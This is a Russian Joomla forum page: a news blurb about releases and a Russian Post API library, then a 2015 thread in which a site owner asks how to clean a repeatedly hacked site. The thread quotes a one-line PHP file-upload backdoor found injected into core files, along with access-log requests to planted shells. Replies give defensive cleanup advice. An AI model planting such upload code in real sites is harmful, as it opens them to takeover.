Новости Joomla

Вышли релизы безопасности Joomla 6.1.3 и Joomla 5.4.8

Релиз безопасности Joomla 6.1.3 и Joomla 5.4.8

Проект Joomla! рад сообщить о выходе Joomla 6.1.3 и Joomla 5.4.8. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

Joomla 5+ пакет для интеграции с API Почты России: нормализация данных, расчёт доставки, создание отправлений, партии, документы, возвраты, поиск отделений, справочники и SOAP-отслеживание.

v.3.0.0. Что нового?
Это дальнейшее развитие ранее закрытой Joomla-библиотеки для работы с API сервиса Отправка (для бизнеса) Почты России. Поэтому версия не 1.0.0, а 3.0.0.

Сейчас эта библиотека ушла от собственных реализаций и стала Joomla-обёрткой известного PHP SDK от Lapay Group.

Возможности библиотеки.
- получение настроек аккаунта, точек сдачи и текущего остатка запросов к API;
- нормализация адресов, ФИО и телефонов перед созданием отправления;
- расчёт тарифа и срока доставки;
- создание, поиск, изменение, удаление и возврат заказов в состояние «Новые»;
- проверка надёжности получателя;
- создание партий, просмотр партий и заказов внутри партии;
- генерация пакета печатных документов и формы Ф103;
- создание, изменение и удаление возвратных отправлений;
- поиск отделений по индексу, адресу и координатам, получение сервисов отделения;
- локальный список стран;
- SOAP-отслеживание операций по РПО и работа с билетами пакетного трекинга.

👩‍💻 Joomla-возможности.
В пакете библиотеки WT Otpravkapochtaru есть поля Joomla Form для расширений. Они позволяют работать в интерфейсе Joomla с некоторыми типами данных, получаемых по API из вашего личного кабинета в ЛК Почты России для бизнеса.
На данный момент в библиотеке доступны 3 поля списков, которые отображают доступные в аккаунте ОПС, типы и категории отправлений.
Поддерживаются зависимые списки: значение одного поля обновляется при изменении другого.

Системные требования.
Системные требования в основном связаны с системными требованиями апстрима библиотеки - LapayGroup PHP SDK.
- Joomla 5+
- PHP 8.3+
- Расширения PHP:
-- ext-mbstring
-- ext-simplexml
-- ext-soap (опционально, для трекинга)
-- ext-zip

Ссылки:
- Страница расширения
- GitHub библиотеки и документация

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 19 Ответов
  • 4635 Просмотров
*

13th_doctor_who

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Уязвимость Joomla
« : 07.06.2015, 16:56:48 »
Добрый день, проблема такая, в 5х php файлах (loader.php , import.legacy.php, cms.php...) были обнаружены такие строчки:
"if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}"
после чего сайт перестал работать до их удаления, 3 недели до этого, был похожий случай, так же пофикшен их удалением, в чем проблема, где может быть дыра?
Так же в файле config.php содержится такой код, это нормально?
Спойлер
[свернуть]
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Уязвимость Joomla
« Ответ #1 : 07.06.2015, 17:12:21 »
версия Joomla ? сканером еще поищи вирус/шелл
config.php удали
*

13th_doctor_who

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Уязвимость Joomla
« Ответ #2 : 07.06.2015, 17:29:08 »
версия Joomla ? сканером еще поищи вирус/шелл
config.php удали
Версия 3.1, какой сканер посоветуете? config.php удалил
*

wishlight

  • Гуру
  • 5099
  • 322 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Уязвимость Joomla
« Ответ #3 : 07.06.2015, 19:30:07 »
ai-bolit. ПС.. Не люблю доктора :)
*

13th_doctor_who

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Уязвимость Joomla
« Ответ #4 : 11.06.2015, 21:01:16 »
Почистил сайт, но начали появлятся файлы под названиями "config.php" "libraries/joomla/crypt/error.php" "public_html/includes/system.php" "./public_html/images/sampledata/xml.php
.//public_html/images/color/session.php
./public_html/sxd/lang/view.php"
С содержимым по типу config.php в шапке топика, в чем может быть проблема, неужто из за версии движка 3.3.1? Есть ли способы найти проблему и что делать? В логах ничего интересного.
*

beliyadm

  • Легенда
  • 9758
  • 1665 / 66
  • Севастополь, Россия
Re: Уязвимость Joomla
« Ответ #5 : 11.06.2015, 21:05:24 »
значит внимательно читать access.log и прочие логи, скорей всего где то сидит типа шелл, который это дело и производит
Можно пройтись поиском по всему сайту, поискать где есть вхождение eval
Все расширения на сайте легальны и куплены? Пароли на все (фтп, бд, админ) изменены?
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Сделать всё хорошо
TLG: @Beliyadm
*

13th_doctor_who

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Уязвимость Joomla
« Ответ #6 : 11.06.2015, 21:19:17 »
значит внимательно читать access.log и прочие логи, скорей всего где то сидит типа шелл, который это дело и производит
Можно пройтись поиском по всему сайту, поискать где есть вхождение eval
Все расширения на сайте легальны и куплены? Пароли на все (фтп, бд, админ) изменены?
Все легально, все пароли сменили, на eval искал по ftp, много нашёл и удалил, проверил антивирусниками и в ручную, но вчера опять появился новый файл ("libraries/joomla/crypt/error.php"), в котором был вредоносный код, в логах ничего интересного нет.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Уязвимость Joomla
« Ответ #7 : 11.06.2015, 21:24:46 »
Встречал еще и такой файл, в начале проверка пароля через $auth_pass , а потом обфусцированный код
*

13th_doctor_who

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Уязвимость Joomla
« Ответ #8 : 11.06.2015, 21:27:32 »
Встречал еще и такой файл, в начале проверка пароля через $auth_pass , а потом обфусцированный код
Что в таком случае делать? Обновлять двиг не хочется, да и не уверен что поможет, чистить каждый день от вирусов тоже не вариант, хостинг уже заблокировал почтовые ф-ции аккаунта...
*

beliyadm

  • Легенда
  • 9758
  • 1665 / 66
  • Севастополь, Россия
Re: Уязвимость Joomla
« Ответ #9 : 11.06.2015, 21:30:49 »
слить все на локаль, еще раз проверить всеми антивирусами и руками на eval и подобное
сменить все логины\пароли, адреса, ipшники, страну проживания

Ну честно, не бывает чудес, либо вы ставили варезное расширение либо у вас в компе вирус, который есть младенцев берет пароли с ftp клиента и все
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Сделать всё хорошо
TLG: @Beliyadm
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Уязвимость Joomla
« Ответ #10 : 11.06.2015, 22:16:08 »
Что в таком случае делать? Обновлять двиг не хочется, да и не уверен что поможет, чистить каждый день от вирусов тоже не вариант, хостинг уже заблокировал почтовые ф-ции аккаунта...
Если Joomla твоей версии и расширения содержать уязвимость, то нет смысла каждый день чистить.
Можно применить сканер мониторинга файлов, типа Eyesite . Узнать откуда рассылка спама можно, если версия PHP не ниже 5.3, с помощью mail.add_x_header
*

beliyadm

  • Легенда
  • 9758
  • 1665 / 66
  • Севастополь, Россия
Re: Уязвимость Joomla
« Ответ #11 : 11.06.2015, 22:17:55 »
Если Joomla твоей версии и расширения содержать уязвимость, то нет смысла каждый день чистить.
Простите, что? если расширения содержат уязвимость - нет смысла их искать и чистить?
И что означает "твоей"?
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Сделать всё хорошо
TLG: @Beliyadm
*

13th_doctor_who

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Уязвимость Joomla
« Ответ #12 : 12.06.2015, 01:31:20 »
Проверил файлы, нашёл в 30 файлах такой код:
Так же заметил, что все файлы были модифицырованы 08.06 в 1.27
Ацес логи за то время:
Спойлер
[свернуть]
*

13th_doctor_who

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Уязвимость Joomla
« Ответ #13 : 12.06.2015, 01:35:49 »
Насколько я понял, все началось после ""GET /cache/cwm.php " в самом файле, который я потер только что, лежал огромный eval код, так ли?
За 7 число нашёл логи с файлом cwp.php в котором похожий код:
Спойлер
[свернуть]
Что скажете по логам, каким способом вредоносные файлы попали на сайт? Все таки проблема в слитых паролях или каких то уязвимостях?
« Последнее редактирование: 12.06.2015, 01:46:50 от 13th_doctor_who »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Уязвимость Joomla
« Ответ #14 : 12.06.2015, 07:56:08 »
.htaccess , с запретом на выполнение скриптов, в папку кеш, и желательно еще и в /images
*

wishlight

  • Гуру
  • 5099
  • 322 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Уязвимость Joomla
« Ответ #15 : 12.06.2015, 08:39:11 »
неужто из за версии движка 3.3.1

Да
*

13th_doctor_who

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Уязвимость Joomla
« Ответ #16 : 12.06.2015, 14:10:34 »
.htaccess , с запретом на выполнение скриптов, в папку кеш, и желательно еще и в /images
Не думаю что поможет, так как подобная проблема была в других папках, может посоветуете какой то плагин, который заблокирует действия по типу:
"POST /cache/com_jcomments_objects_com_jshopping/plugin.php"
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Уязвимость Joomla
« Ответ #17 : 12.06.2015, 14:59:44 »
Не думаю что поможет, так как подобная проблема была в других папках, может посоветуете какой то плагин, который заблокирует действия по типу:
"POST /cache/com_jcomments_objects_com_jshopping/plugin.php"
Другие папки тоже надо закрывать, а не только кеш и images

Что скажете по логам, каким способом вредоносные файлы попали на сайт? Все таки проблема в слитых паролях или каких то уязвимостях?
этих логов не достаточно, было бы не плохо посмотреть дату создания и модификации вредоносных файлов и по цепочки отслеживать. Проблемой может быть что угодно, как просто слитые пароли, так и уязвимсоти и не надежность хостера, тут нужно комплексно подходить к решению задачи, грамматно навести профилактические меры, чистку вредоносов, выставить политику логирования, также бы не помешала, какая нить система IDS но такие систему могут нагружать работу CMS.
« Последнее редактирование: 12.06.2015, 15:08:57 от winstrool »
*

13th_doctor_who

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Уязвимость Joomla
« Ответ #18 : 12.06.2015, 15:11:49 »
Другие папки тоже надо закрывать, а не только кеш и images
Закрыл через .htaccess:
Спойлер
[свернуть]
Поставил на сайт: Eyesite (Для мониторинга изменений) и Marco's SQL Injection - LFI Interceptor для защиты.
Почистил все файлы, буду надеяться что поможет.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Уязвимость Joomla
« Ответ #19 : 12.06.2015, 15:16:20 »
Закрыл через .htaccess:
Спойлер
[свернуть]
Поставил на сайт: Eyesite (Для мониторинга изменений) и Marco's SQL Injection - LFI Interceptor для защиты.
Почистил все файлы, буду надеяться что поможет.
Недостаточно расширений, обходятся легко!, не поможет.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

Ответов: 1
Просмотров: 4771
Последний ответ 23.04.2024, 10:06:10
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 6294
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 6590
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

Ответов: 5
Просмотров: 3830
Последний ответ 13.09.2021, 09:23:28
от Oleg+
Joomla 1.5 и 2.5 на одном хостинге

Автор andreU

Ответов: 28
Просмотров: 18021
Последний ответ 25.04.2021, 19:42:48
от rsn